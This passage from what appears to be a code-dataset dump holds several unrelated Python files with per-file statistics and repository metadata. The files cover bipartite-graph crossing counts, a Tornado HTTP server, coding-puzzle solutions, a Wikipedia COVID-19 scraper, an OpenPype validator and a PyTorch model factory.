elif (G.pi_1[i] > G.pi_1[j]) and (G.pi_2[k] < G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
c = c + 1
return c
def _cross_n(G, e1, e2):
i = e1[0]
k = e1[1]
j = e2[0]
l = e2[1]
if (G.pi_1[i] < G.pi_1[j]) and (G.pi_2[k] > G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
return 1
elif (G.pi_1[i] > G.pi_1[j]) and (G.pi_2[k] < G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
return 1
return 0
def _cross_w(G, edgeslist):
e1 = edgeslist[0]
#with ThreadPoolExecutor(6) as ex:
output = list(map(lambda x: _cross_n(G, e1, x), edgeslist[1:]))
#output=0
#for e2 in edgeslist[1:]:
# output = output + _cross_n(G, e1, e2)
return sum(output)
def crossing2(G):
edgeslist = G.edges()
c = 0
with ThreadPoolExecutor(6) as ex:
output = list(ex.map(lambda x: _cross_w(G, x), [edgeslist[i:] for i in range(len(edgeslist))]))
return c + int(sum(output))
@njit
def _numba_cross(pi_1, pi_2, edgeslist):
c = 0
for s, e1 in enumerate(edgeslist):
i = e1[0]
k = e1[1]
for e2 in edgeslist[s+1:]:
j = e2[0]
l = e2[1]
if (pi_1[i] < pi_1[j]) and (pi_2[k] > pi_2[l]) and (pi_1[i] * pi_1[j] * pi_2[k] * pi_2[l]):
c = c + 1
elif (pi_1[i] > pi_1[j]) and (pi_2[k] < pi_2[l]) and (pi_1[i] * pi_1[j] * pi_2[k] * pi_2[l]):
c = c + 1
return c
def crossing3(G):
edgeslist = G.edges()
c = 0
pi_1 = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
pi_2 = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
pi_1.update(G.pi_1)
pi_2.update(G.pi_2)
output = _numba_cross(pi_1, pi_2, List(edgeslist))
return c + output
def bdp_lyt(G, size = 4/3, height = 100): ## Formata lyt adequado para o plot do grafo
import numpy as np
#G, center = _process_params(G, center=center, dim=2)
#if len(G) == 0:
# return {}
#center = np.zeros(2)
top = G.v1()[::-1]
bottom = G.v2()[::-1]
height = 100
width = size * height
offset = (width/2, height/2)
nodes = top + bottom
left_xs = np.repeat(0, len(top))
right_xs = np.repeat(width, len(bottom))
left_ys = np.linspace(0, height, len(top))
right_ys = np.linspace(0, height, len(bottom))
top_pos = np.column_stack([left_xs, left_ys]) - offset
bottom_pos = np.column_stack([right_xs, right_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
#pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(nodes, pos))
return pos
#plot utilizando o lyt adequado
def plotBGraph(G, size = 4/3, height=100):
B = nx.Graph()
B.add_nodes_from(G.v1(), bipartite=1)
B.add_nodes_from(G.v2(), bipartite=2)
B.add_edges_from(G.edges())
pos = bdp_lyt(G, size, height)
nx.draw(B, pos)
nx.draw_networkx_labels(B, pos)
#plt.savefig("test.pdf")
#plt.show()
def bary_sort(barylist, nodelist):
aux = [(pos, v) for (pos, v) in zip(barylist, nodelist)]
aux.sort(key=lambda tup: tup[0])
return list(np.int0(np.array(aux)[:,1]))
#encontra baricentro do vertice
def bary(G, v, v_layer = None):
b = 0
if v_layer == None:
return
elif v_layer == 1:
pi_k = G.v2()
K = [x for x in pi_k if (((v, x) in G.edges()) or ((x, v) in G.edges())) and G.pi_2[x] > 0] #encontra os viznho do vertice v na 2a camada
if len(K) > 0:
b = G.perm_v2(K).mean()
elif v_layer == 2:
pi_k = G.v1()
#K = [x for x in pi_k if (x, v) in G.edges()] #encontra os viznho do vertice v na 1a camada
K = [x for x in pi_k if (((v, x) in G.edges()) or ((x, v) in G.edges())) and G.pi_1[x] > 0]
if len(K) > 0:
b = G.perm_v1(K).mean()
return b
@njit
def _deg(nodelist, subgraph, edges):
deg = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
for v in nodelist:
K = [x for x in subgraph if ((v, x) in edges) or ((x, v) in edges)]
deg[v] = len(K)
return deg
class BGraph:
""" aux """
def __init__(self):
self._set_v1 = []
self._set_v2 = []
self._set_edges = []
self.pi_1 = {}
self.pi_2 = {}
self._adj = {}
self._nodes = {}
@property
def adj(self):
return self._adj
def __getitem__(self, n):
return self.adj[n]
def edges(self, edgelist = None):
if edgelist != None:
self._set_edges = []
self._set_edges = edgelist
for e in edgelist:
u, v = e
if u not in self._nodes:
self._adj[u] = {}
self._nodes[u] = {}
if v not in self._nodes:
self._adj[v] = {}
self._nodes[v] = {}
datadict = self._adj[u].get(v, {})
self._adj[u][v] = datadict
self._adj[v][u] = datadict
else:
return self._set_edges
def v1 (self, setlist = None):
if setlist != None:
self._set_v1 = []
self._set_v1 = setlist
self.pi_1 = dict(zip(self._set_v1,self.perm_v1()))
for u in setlist:
if u not in self._nodes:
self._nodes[u] = {}
self._adj[u] = {}
else:
return self._set_v1
def v2 (self, setlist = None):
if setlist != None:
self._set_v2 = []
self._set_v2 = setlist
self.pi_2 = dict(zip(self._set_v2, self.perm_v2()))
for u in setlist:
if u not in self._nodes:
self._nodes[u] = {}
self._adj[u] = {}
else:
return self._set_v2
def perm_v1(self, pos = None):
if pos != None:
return np.vectorize(lambda i: self.pi_1[i])(pos)
else:
return np.vectorize(lambda i: pi(self._set_v1, i))(self._set_v1) + 1
def perm_v2(self, pos = None):
if pos != None:
return np.vectorize(lambda i: self.pi_2[i])(pos)
else:
return np.vectorize(lambda i: pi(self._set_v2, i))(self._set_v2) + 1
def order_v1(self):
#aux = [(pos, v) for (pos, v) in zip(self.pi_1, self. set_v1)]
aux = list( self.pi_1.items() )
aux.sort(key=lambda tup: tup[1])
self.v1(list(np.int0(np.array(aux)[:,0])))
return
def order_v2(self):
#aux = [(pos, v) for (pos, v) in zip(self.pi_2,self. set_v2)]
aux = list( self.pi_2.items() )
aux.sort(key=lambda tup: tup[1])
self.v2(list(np.int0(np.array(aux)[:,0])))
return
def add_v1(self, i, pos):
if pos != -1:
self._set_v1 = self.v1()[:pos] + [i] + self.v1()[pos:]
else:
self._set_v1 = self.v1()[:] + [i]
def add_v2(self, i, pos):
if pos != -1:
self._set_v2 = self.v2()[:pos] + [i] + self.v2()[pos:]
else:
self._set_v2 = self.v2()[:] + [i]
def n_v1(self):
#self.n_v1 = len(self.v1)
return len(self._set_v1)
def n_v2(self):
#self.n_v2 = len(self.v2)
return len(self._set_v2)
def n_edge(self):
return len(self._set_edges)
def n_v(self):
return len(self._nodes)
def density(self):
return len(self._set_edges) / (len(self._set_v1)*len(self._set_v2))
def n_cross(self):
return crossing3(self)
def bc(self, v, k):
return bary(self, v, k)
#@jit(nopython=True)
def degree(self, nodelist = None, subgraph = None):
#deg = {}
if nodelist is None:
nodelist = (self.v1() + self.v2())
if subgraph is None:
subgraph = (self.v1() + self.v2())
# for v in self.v1():
# K = [x for x in self.v2() if (v, x) in self.edges()]
# deg[v] = len(K)
# for v in self.v2():
# K = [x for x in self.v1() if (x, v) in self.edges()]
# deg[v] = len(K)
d = _deg(List(nodelist), List(subgraph), List(self.edges()))
return d
def move_v1(self, v, pos, inplace=False):
aux = self.pi_1.copy()
pos_v = aux.pop(v)
aux = np.array(list(aux.items()))
aux[ aux[:,1] >= pos_v, 1] = aux[ aux[:,1] >= pos_v, 1] - 1
aux[ aux[:,1] >= pos, 1] = aux[ aux[:,1] >= pos, 1] + 1
aux = dict(aux)
aux[v] = pos
if not inplace:
return aux
else:
self.pi_1 = aux
def move_v2(self, v, pos, inplace=False):
aux = self.pi_2.copy()
pos_v = aux.pop(v)
aux = np.array(list(aux.items()))
aux[ aux[:,1] >= pos_v, 1] = aux[ aux[:,1] >= pos_v, 1] - 1
aux[ aux[:,1] >= pos, 1] = aux[ aux[:,1] >= pos, 1] + 1
aux = dict(aux)
aux[v] = pos
if not inplace:
return aux
else:
self.pi_2 = aux
def plot(self, size=4/3, height=100, order=0):
if order:
self.order_v1()
self.order_v2()
plotBGraph(self, size=size, height=height)
def K(self, u, v):
i = u
j = v
#G.move_v1(i, j, True)
#G.move_v1(j, i, True)
c = 0
if u in self._set_v1:
pi = self.pi_2
elif u in self._set_v2:
pi = self.pi_1
#nodes_between = [v for v in G.pi_1 if G.pi_1[v] >= G.pi_1[i] and G.pi_1[v] <= G.pi_1[j]]
#while nodes_between:
# i = nodes_between.pop()
# for j in nodes_between:
#print(pi)
for k in self._adj[i]:
for l in self._adj[j]:
if (pi[k] > pi[l]):
c = c + 1
return c
def find_pos(self, u, pos):
if u in self._set_v1:
pi = self.pi_1
elif u in self._set_v2:
pi = self.pi_2
return [u for u in pi if pi[u] == pos][0]
def copy(self):
return copy.deepcopy(self)
| 28.06506
| 145
| 0.479608
| 1,776
| 11,647
| 2.99268
| 0.109234
| 0.024835
| 0.01731
| 0.008467
| 0.457761
| 0.42032
| 0.358231
| 0.324929
| 0.270367
| 0.22032
| 0
| 0.042021
| 0.374775
| 11,647
| 415
| 146
| 28.06506
| 0.68786
| 0.099081
| 0
| 0.366782
| 0
| 0
| 0.000575
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131488
| false
| 0
| 0.034602
| 0.034602
| 0.304498
| 0.00346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbf5e2f65d38e783f4768e0ca9abc2a32d54029
| 3,403
|
py
|
Python
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 4
|
2018-05-24T13:38:23.000Z
|
2021-08-18T08:32:54.000Z
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 20
|
2018-04-10T09:28:01.000Z
|
2022-03-17T11:43:59.000Z
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 3
|
2017-06-07T13:28:38.000Z
|
2019-07-16T10:02:21.000Z
|
"""odin.http.server - ODIN HTTP Server class.
This module provides the core HTTP server class used in ODIN, which handles all client requests,
handing off API requests to the appropriate API route and adapter plugins, and defining the
default route used to serve static content.
Tim Nicholls, STFC Application Engineering
"""
import logging
import tornado.gen
import tornado.web
import tornado.ioloop
from tornado.log import access_log
from odin.http.routes.api import ApiRoute
from odin.http.routes.default import DefaultRoute
class HttpServer(object):
"""HTTP server class."""
def __init__(self, debug_mode=False, access_logging=None,
static_path='./static', adapters=None):
"""Initialise the HttpServer object.
:param debug_mode: Set True to enable Tornado debug mode
:param static_path: Set the path to static file content rendered by default route
:param adapters: list of adapters to register with API route
"""
settings = {
"debug": debug_mode,
"log_function": self.log_request,
}
# Set the up the access log level
if access_logging is not None:
try:
level_val = getattr(logging, access_logging.upper())
access_log.setLevel(level_val)
except AttributeError:
logging.error(
"Access logging level {} not recognised".format(access_logging)
)
# Create an API route
self.api_route = ApiRoute()
# Register adapters with the API route and get handlers
for adapter in adapters:
self.api_route.register_adapter(adapters[adapter])
# Initialize adapters for all those that require inter adapter communication
self.api_route.initialize_adapters()
handlers = self.api_route.get_handlers()
# Create a default route for static content and get handlers
default_route = DefaultRoute(static_path)
handlers += default_route.get_handlers()
# Create the Tornado web application for these handlers
self.application = tornado.web.Application(handlers, **settings)
def listen(self, port, host=''):
"""Listen for HTTP client requests.
:param port: port to listen on
:param host: host address to listen on
"""
self.application.listen(port, host)
def log_request(self, handler):
"""Log completed request information.
This method is passed to the tornado.web.Application instance to override the
default request logging behaviour. In doing so, successful requests are logged
at debug level rather than info in order to reduce the rate of logging under
normal conditions.
:param handler: currently active request handler
"""
if handler.get_status() < 400:
log_method = access_log.debug
elif handler.get_status() < 500:
log_method = access_log.warning
else:
log_method = access_log.error
request_time = 1000.0 * handler.request.request_time()
log_method("%d %s %.2fms", handler.get_status(),
handler._request_summary(), request_time)
def cleanup_adapters(self):
"""Clean up state of registered adapters.
"""
self.api_route.cleanup_adapters()
| 35.447917
| 96
| 0.658537
| 416
| 3,403
| 5.269231
| 0.355769
| 0.032847
| 0.027372
| 0.024635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004841
| 0.271525
| 3,403
| 95
| 97
| 35.821053
| 0.879387
| 0.399647
| 0
| 0
| 0
| 0
| 0.039494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.159091
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc0751188e1d1856d4d69064affd55e5821f001
| 1,382
|
py
|
Python
|
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
# @file Valid Parentheses
# @brief Given a string containing just the characters '(', ')', '{', '}',
# '[' and ']', determine if the input string is valid.
# https://leetcode.com/problems/valid-parentheses/
import collections
'''
Given a string containing just the characters '(', ')', '{', '}', '[' and ']',
determine if the input string is valid.
The brackets must close in the correct order, "()" and "()[]{}" are all valid
but "(]" and "([)]" are not.
'''
# time complexity : O(n)
# space complexity: O(n)
def isValid(self, s):
# Use a dictionary to match fwd and rev brackets
dct = {'(': ')', '{': '}', '[': ']'} # HashTable for fwd -> reverse braces
# For each fwd brace record corresponding reverse brace to match
stk = collections.deque()
for char in s:
if char in dct: # If char is fwd bracket
stk.append(dct[char]) # Append corresponding rev bracket
elif char in ')}]': # If char is rev bracket
if len(stk) == 0: # Ensure no extra rev brackets
return False
elif char != stk.pop(): # Verify rev bracket type
return False
else: # Found non fwd/rev bracket character
return False
return len(stk) == 0 # Ensure no extra fwd bracket
| 40.647059
| 79
| 0.552822
| 166
| 1,382
| 4.60241
| 0.457831
| 0.052356
| 0.031414
| 0.057592
| 0.246073
| 0.246073
| 0.193717
| 0.193717
| 0.193717
| 0.193717
| 0
| 0.002128
| 0.319826
| 1,382
| 33
| 80
| 41.878788
| 0.810638
| 0.429812
| 0
| 0.2
| 0
| 0
| 0.01676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc0a159fdea30685a3e6c6f67386c3bf2f75073
| 3,746
|
py
|
Python
|
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from collections import deque
def parse_and_sort_topics(topics):
topic_deque = deque(tuple(topic.split(' ')) for topic in topics)
word0s = [item[0] for item in topic_deque]
word1s = [item[1] for item in topic_deque]
topic_deque = deque(sorted(list(topic_deque),
key=lambda x: (word0s.count(x[0]) + word1s.count(x[1]),
word1s.count(x[1]),
word0s.count(x[0]))))
sorted_topics = []
while len(topic_deque) > 0:
topic = topic_deque.popleft()
sorted_topics.append(topic)
added_word0s = [item[0] for item in sorted_topics]
added_word1s = [item[1] for item in sorted_topics]
topic_deque = deque(sorted(list(topic_deque),
key=lambda x: (added_word0s.count(x[0]) + added_word1s.count(x[1]),
added_word1s.count(x[1]),
added_word0s.count(x[0]),
word0s.count(x[0]) + word1s.count(x[1]),
word1s.count(x[1]),
word0s.count(x[0]))))
return sorted_topics
def count_fake(topics):
word0_dict = {}
word1_dict = {}
real_count = 0
fake_count = 0
sorted_topics = parse_and_sort_topics(topics)
print(sorted_topics)
for topic in sorted_topics:
word0, word1 = topic
try:
word0_count = word0_dict[word0]
except KeyError:
word0_dict[word0] = 0
try:
word1_count = word1_dict[word1]
except KeyError:
word1_dict[word1] = 0
if word0_dict[word0] > 0 and word1_dict[word1] > 0:
fake_count += 1
else:
real_count += 1
word0_dict[word0] += 1
word1_dict[word1] += 1
return fake_count
if __name__ == '__main__':
import os
samples = [
['HYDROCARBON COMBUSTION',
'QUAIL BEHAVIOR',
'QUAIL COMBUSTION'],
['CODE JAM',
'SPACE JAM',
'PEARL JAM'],
['INTERGALACTIC PLANETARY',
'PLANETARY INTERGALACTIC'],
['BOUNDARY GRAVITY',
'BOUNDARY HERMENEUTICS',
'BOUNDARY TRANSGRESSION',
'QUANTUM GRAVITY',
'QUANTUM HERMENEUTICS',
'QUANTUM TRANSGRESSION',
'TRANSFORMATIVE GRAVITY',
'TRANSFORMATIVE HERMENEUTICS',
'TRANSFORMATIVE TRANSGRESSION'],
['GF CH',
'RO GI',
'YB GI',
'TD HI',
'YG HI',
'IZ NB',
'BQ TA',
'GF TP',
'GR WG',
'IZ ZD']
]
for sample in samples:
print(count_fake(sample))
data_files = ['C-small-practice']
for f in data_files:
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'{0}.in'.format(f)), 'r') as input_file:
lines = input_file.readlines()
test_case_count = int(lines[0].replace('\n' ,''))
test_cases = []
inputs = [line.replace('\n', '') for line in lines[1:]]
i = 0
while i < len(inputs):
n = int(inputs[i])
topics = inputs[i+1:i+n+1]
test_cases.append(topics)
i += n+1
i = 1
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'{0}.out'.format(f)), 'w') as output_file:
for test_case in test_cases:
print(i)
output_file.write('Case #{0}: {1}\n'.format(i, count_fake(test_case)))
i += 1
| 30.455285
| 95
| 0.509343
| 427
| 3,746
| 4.274005
| 0.274005
| 0.039452
| 0.039452
| 0.04274
| 0.294795
| 0.227397
| 0.161096
| 0.161096
| 0.161096
| 0.161096
| 0
| 0.032669
| 0.370796
| 3,746
| 122
| 96
| 30.704918
| 0.741621
| 0.005339
| 0
| 0.117647
| 0
| 0
| 0.114362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019608
| false
| 0
| 0.029412
| 0
| 0.068627
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc4e2961bdd997e8ed912766a3c871b4f8b1cc7
| 3,306
|
py
|
Python
|
openmapi/globales.py
|
IgnacioPardo/mAPI-Provincias
|
812fc12bcc72d6aa28ab2e39af2d64d0aa68c86b
|
[
"MIT"
] | 4
|
2020-08-02T06:51:04.000Z
|
2022-03-22T21:31:44.000Z
|
openmapi/globales.py
|
Creativity-Hub/Open-mAPI
|
b7e0ee9acda424aec0e84513d8e968aa6ff5d7c5
|
[
"MIT"
] | null | null | null |
openmapi/globales.py
|
Creativity-Hub/Open-mAPI
|
b7e0ee9acda424aec0e84513d8e968aa6ff5d7c5
|
[
"MIT"
] | 1
|
2022-03-24T22:20:47.000Z
|
2022-03-24T22:20:47.000Z
|
import requests
from bs4 import BeautifulSoup
class Pais:
name = ''
casos = {}
def __init__(self, name, infectados=None, recuperados=None, fallecidos=None, activos = None):
self.name = name
self.casos['infectados'] = infectados
self.casos['recuperados'] = recuperados
self.casos['fallecidos'] = fallecidos
self.casos['activos'] = activos
#Updates case count for register
def update(self, registro, valor):
self.casos[registro] = valor
#Replaces all registers with new dict
def updateAll(self, new):
self.casos = new
#Returns register
def get(self, registro):
return self.casos[registro]
#Returns all registers
def getAll(self):
return self.casos
def __str__(self):
return self.name
def __repr__(self):
return self.name
def __iter__(self):
for registro in self.casos:
yield [registro, self.casos[registro]]
class Globales:
results = {}
registers_label = 'Empty'
def __init__(self):
self.results = {}
#Contabilizes countries.
def count(self):
self.registers_label = len(self.results.keys())+' registros.'
return len(self.results.keys())
def __str__(self):
return self.registers_label
def __repr__(self):
return self.registers_label
def __iter__(self):
for pais in self.results:
yield self.results[pais]
def load(self):
url = "https://en.wikipedia.org/wiki/COVID-19_pandemic_by_country_and_territory"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
noise = soup.find('caption')
noise.decompose()
noise = soup.find_all('td', attrs={'style':'padding:0px 2px;'})
for td in noise:
td.decompose()
noise = soup.find_all('img')
for img in noise:
img.decompose()
noise = soup.find_all("tr", class_="sortbottom")
for tr in noise:
tr.decompose()
table = soup.find("table", class_="wikitable")
rows = table.find_all('tr')
cases, deaths, recov = [title.text.replace('\n', '').replace(',', '.') for title in rows[1].find_all('th')[1:6]][1:4]
active = int(cases.replace('.', '')) - (int(deaths.replace('.', ''))+int(recov.replace('.', '')))
self.results['world'] = Pais('world', cases, recov, deaths, active)
rows = rows[2:]
for row in rows:
country = row.find_all('th')[1].text.replace('\n', '')
if '[' in country:
country = country.split('[')[0]
res = [valor.text.replace('\n', '') for valor in row.find_all('td')[0:3]]
done = False
for i in range(len(res)):
if res[i] == 'No data':
self.results[country] = Pais(country, cases, recov, deaths, '-')
done = True
if ',' in res[i]:
res[i] = res[i].replace(',', '.')
if not done:
done = False
cases, deaths, recov = res
active = int(cases.replace('.', '')) - (int(deaths.replace('.', ''))+int(recov.replace('.', '')))
if active > 999:
active = '{:,}'.format(active).replace(',', '.')
self.results[country] = Pais(country, cases, recov, deaths, active)
self.count()
def getCountry(self, country):
self.load()
return self.results[country]
def getCountryInfo(self, country, info):
self.load()
return self.results[country].get(info)
def getCountryKeys(self):
self.load()
return list(self.results.keys())
def getInfoKeys(self):
return ['infectados', 'fallecidos', 'recuperados', 'activos']
| 23.614286
| 119
| 0.650333
| 436
| 3,306
| 4.816514
| 0.279817
| 0.057619
| 0.033333
| 0.031429
| 0.217619
| 0.152381
| 0.092381
| 0.092381
| 0.049524
| 0.049524
| 0
| 0.006623
| 0.177858
| 3,306
| 140
| 120
| 23.614286
| 0.766004
| 0.038415
| 0
| 0.182796
| 0
| 0
| 0.089764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.021505
| 0.075269
| 0.397849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc738c6ed27c814c11c63a6fb453a793040af60
| 947
|
py
|
Python
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
jonclothcat/OpenPype
|
d1208cbebc0a7f378de0062ccd653295c6399195
|
[
"MIT"
] | 1
|
2022-02-08T15:40:41.000Z
|
2022-02-08T15:40:41.000Z
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
zafrs/OpenPype
|
4b8e7e1ed002fc55b31307efdea70b0feaed474f
|
[
"MIT"
] | 2
|
2022-03-18T01:46:03.000Z
|
2022-03-18T01:46:16.000Z
|
openpype/hosts/tvpaint/plugins/publish/validate_start_frame.py
|
zafrs/OpenPype
|
4b8e7e1ed002fc55b31307efdea70b0feaed474f
|
[
"MIT"
] | null | null | null |
import pyblish.api
from openpype.pipeline import PublishXmlValidationError
from openpype.hosts.tvpaint.api import lib
class RepairStartFrame(pyblish.api.Action):
"""Repair start frame."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
lib.execute_george("tv_startframe 0")
class ValidateStartFrame(pyblish.api.ContextPlugin):
"""Validate start frame being at frame 0."""
label = "Validate Start Frame"
order = pyblish.api.ValidatorOrder
hosts = ["tvpaint"]
actions = [RepairStartFrame]
optional = True
def process(self, context):
start_frame = lib.execute_george("tv_startframe")
if start_frame == 0:
return
raise PublishXmlValidationError(
self,
"Start frame has to be frame 0.",
formatting_data={
"current_start_frame": start_frame
}
)
| 24.921053
| 57
| 0.636748
| 99
| 947
| 5.989899
| 0.505051
| 0.134907
| 0.047218
| 0.070826
| 0.094435
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.269271
| 947
| 37
| 58
| 25.594595
| 0.851156
| 0.061246
| 0
| 0
| 0
| 0
| 0.138952
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.115385
| 0
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc862cde96df508b37a55b7bb12e12b0c12e813
| 3,548
|
py
|
Python
|
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
utils/Model_builder.py
|
Devwalkar/General_codebase
|
d52eee09248caa715d7e5e8b87f145d1989e278d
|
[
"MIT"
] | null | null | null |
import torch
import pretrainedmodels as PM
import torch.nn as nn
from .Mobilenet import MobileNetV2
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def Model_builder(configer):
model_name = configer.model['name']
No_classes = configer.dataset_cfg["id_cfg"]["num_classes"]
model_pretrained = configer.model['pretrained']
model_dataparallel = configer.model["DataParallel"]
model_gpu_replica = configer.model["Multi_GPU_replica"]
gpu_ids = configer.train_cfg["gpu"]
if model_name == "Inceptionv3":
model = PM.inceptionv3(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Xception":
model = PM.xception(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "VGG_19":
model = PM.vgg19(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet18":
model = PM.resnet18(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet50":
model = PM.resnet50(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet101":
model = PM.resnet101(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet152":
model = PM.resnet152(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Resnet34":
model = PM.resnet34(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "Densenet121":
model = PM.densenet121(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "ResNeXt101-32":
model = PM.resnext101_32x4d(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "ResNeXt101-64":
model = PM.resnext101_64x4d(num_classes = 1000,pretrained=model_pretrained)
d = model.last_linear.in_features
model.last_linear = nn.Linear(d, No_classes)
elif model_name == "MobilenetV2":
model = MobileNetV2(n_class=No_classes)
else:
raise ImportError("Model Architecture not supported")
# Performing Data Parallelism if configured
if model_dataparallel:
model = torch.nn.DataParallel(model.to(device),device_ids =gpu_ids)
elif model_gpu_replica:
torch.distributed.init_process_group(backend='nccl',world_size=1,rank=1)
model = torch.nn.DistributedDataParallel(model.to(device),device_ids =gpu_ids)
else:
model = model.to(device)
print ('---------- Model Loaded')
return model
| 37.744681
| 94
| 0.669391
| 441
| 3,548
| 5.14059
| 0.188209
| 0.08734
| 0.145567
| 0.116453
| 0.572122
| 0.572122
| 0.572122
| 0.54742
| 0.54742
| 0.54742
| 0
| 0.039209
| 0.230834
| 3,548
| 94
| 95
| 37.744681
| 0.791499
| 0.011556
| 0
| 0.347826
| 0
| 0
| 0.071491
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014493
| false
| 0
| 0.072464
| 0
| 0.101449
| 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
